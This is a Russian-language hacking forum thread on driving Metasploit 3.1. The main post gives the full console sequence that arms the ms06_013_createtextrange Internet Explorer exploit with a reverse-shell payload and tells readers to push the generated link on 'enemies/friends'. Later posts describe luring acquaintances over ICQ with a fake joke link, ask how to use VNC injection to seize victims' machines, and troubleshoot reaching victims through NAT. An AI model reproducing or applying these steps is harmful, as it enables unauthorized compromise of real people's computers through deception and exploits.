запускаю нет кат который шел с метасплойтом 3.1 появляется окно в нем CMD line: и чего мне тут прописывать
Итак, коротко о Metasploit fгаmеwork 3.1: Напишу только про консольный вариант. Запускаем Metasploit 3 GUI. После этого клацаем Window -> Console (Ctrl+O). И так переда нами открыта консоль, а именно: Code: _ _ _ _ | | | | (_) | _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| | | |_| =[ msf v3.1-release + -- --=[ 262 exploits - 117 payloads + -- --=[ 17 encoders - 6 nops =[ 46 aux Для просмотра основных команд, наберите в консоли: msf > help Command Description ------- ----------- ?-------------------Help menu back--------------Move back from the current context banner-----------Display an awesome metasploit banner cd-----------------Change the current working directory exit---------------Exit the console help--------------Help menu info---------------Displays information about one or more module irb----------------Drop into irb scripting mode jobs--------------Displays and manages jobs load--------------Load a framework plugin loadpath--------Searches for and loads modules from a path quit--------------Exit the console route------------Route traffic through a session save-------------Saves the active datastores search-----------Searches module names and descriptions sessions--------Dump session listings and display information about sessions set---------------Sets a variable to a value setg-------------Sets a global variable to a value show------------Displays modules of a given type, or all modules sleep------------Do nothing for the specified number of seconds unload----------Unload a framework plugin unset-----------Unsets one or more variables unsetg---------Unsets one or more global variables use--------------Selects a module by name version---------Show the console library version number exploit -------- Run exploit Затем, пишем в консоли show, в консоли появиться список всего что есть в папке, а именно: Code: Encoders--------------------Кодирующие устройства NOP Generators-----------Генераторы только для указанных целей Exploits----------------------Эксплоиты Payloads---------------------Начинка Auxiliary----------------------Вспомогательный // заранее извините за такой перевод, переводил online-переводчиком. Распрастранённые ошибки расматривать не буду, так как о них описано в первом посте: http://forum.antichat.ru/showpost.php?p=173560&postcount=1 Продолжим, находим интересующий нас сплоит, предположим, это будет: windows/browser/ms06_013_createtextrange --------------Internet Explorer createTextRange() Code Execution Пишем в консоли: msf > info windows/browser/ms06_013_createtextrange Code: Name: Internet Explorer createTextRange() Code Execution Version: 4645 Platform: Windows Privileged: No License: Metasploit Framework License Provided by: Faithless <[email protected]> Darkeagle <unl0ck.net> hdm <[email protected]> justfriends4n0w <[email protected]> anonymous <[email protected]> Available targets: Id Name -- ---- 0 Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2) 1 Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2) Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. URIPATH no The URI to use for this exploit (default is random) Нас интересует строчка Basic options: SRVHOST - Локальный IP адрес сервера SRVPORT - его порт (8080 - по умолчанию) Практическое использование: Эксплоит: windows/browser/ms06_013_createtextrange, начинка windows/shell_reverse_tcp msf > use windows/browser/ms06_013_createtextrange msf exploit(ms06_013_createtextrange) > set SRVHOST ххх.ххх.ххх.ххх SRVHOST => ххх.ххх.ххх.ххх msf exploit(ms06_013_createtextrange) > set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(ms06_013_createtextrange) > exploit [*] Started reverse handler [*] Using URL: http://ххх.ххх.ххх.ххх:8080/X6boTVOxklj [*] Server started. После этого, впариваем врагам/друзьям эту ссылку.. После того как он заходит по ссылке, в консоли мы увидим следующее: [*] Sending exploit to ххх.ххх.ххх.ххх:2810... Все, эксплоит работает. p.s. сильно не пинайте
незнаю я например не вижу смысла описывать один и тот же баг снова! помойму метасплоиту можно найти и интересней применение по взлому! Поэтому оч жду статью от -=lebed=-
Используйте лудше пока 3 метасплоит в веб режиме )Намного проще...Можна выбрать какой будем использовать експлолит настроить начинку...все довольно просто особенно после того как прочитать статьи...и после просмотра видео в котором наглядно показывают как пользоватся експлолитом.
Просто надо научится пользоватся 3.1 и все будет оК . да хоть 3 и проще но мне например больше нравится 3.1 . Если кто то опишет как им пользоваться по подробнее то всем всё станет ясно и понятно
может кто выложит поподробнеее инфо о PAYLOAD для VNC inject. Хочу деда добыть.Какие установки и что к чему. Кто знает инфо о других нагрузках...?
посмотри здесь http://www.metasploit.com/projects/Framework/docs/userguide/node52.html и здесь http://www.linickx.com/archives/219/how-to-exploit-ms06-040
ды в 3.1 всё почти тоже самое что и в 3.0 ( правдо 3.0 непользовался но читал статью об использовании 3.0 и она подходит к 3.1) запуск консоли: Пуск>Все программы>Metaslpoit 3>Metaslpoit 3 GUI (вверху закладка windows>console) Веб интерфэйс: Пуск>Все программы>Metaslpoit 3>Metaslpoit 3 Web а так всё как в 3.0 только сплоитов и шеллов побольше вот наиболее подходящщая статья для новичков в примерах (наверно она есть на ачате но в лом искать ссылку) http://www.nulled.ws/showthread.php?t=12613 правдо та комбинация сплоита и шелла которая там описывается уже не актуальна но понять как и что к чему можно скачать 3.1 можно сдесь http://www.metasploit.com/framework/
Здравствуйте, у меня такая проблема: скидываю ссылку своим знакомым в асе типа "Маша, смотри какой прикол: http://10.0.0.1:8080/ (прим. вообще-то тут должен быть внешний ip)" прошу их зайти по ней, они заходят, но.....у меня ничего срабатывает, у них пишется "сервер недоступен", когда я захожу по ней, получается сам на себя, то у меня всё работает, делал всё так как написано ниже.....где то в глубине души я понимаю что что-то делаю не так, но что??? У меня модемное соединение.....использовал Metasploit Framework v 2.6... msf > use ie_xp_pfv_metafile msf ie_xp_pfv_metafile > set LHOST 10.0.0.1 LHOST -> 10.0.0.1 msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf ie_xp_pfv_metafile(win32_reverse) >msf ie_xp_pfv_metafile(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://10.0.0.1:8080/ ссылку надо давать на твой внешний АЙПИ (уже не раз обсуждалось) если твой сервер у жертвы недоступен через интернет, то вполне возможно ты за NAT или блокирует файрвол внешние подключения. Главное условие успеха - чтоб твой сервер метасплоита был доступен жертве через интернет. P.S. Давно пора юзать уже версию 3.1 -=lebed=-
Привет всем, у меня не запускается Metasploit Framework 3.1...запускаю Metasploit 3 GUI на секунду появляется окно cmd и пропадает, дальше ничего не происходит...не работает ничего, кроме VNC, может кто сталкивался с этим и знает что делать?
Ну хоть кто-то знает же Попробуй поставить последний NET.Framework от мелкомягких, возможно это решит проблему. -=lebed=-
Вот у мя вопрос а какое имя у сплойта (use ie_xp_pfv_metafile) в 3.1 версии! с таким именем не нашел!!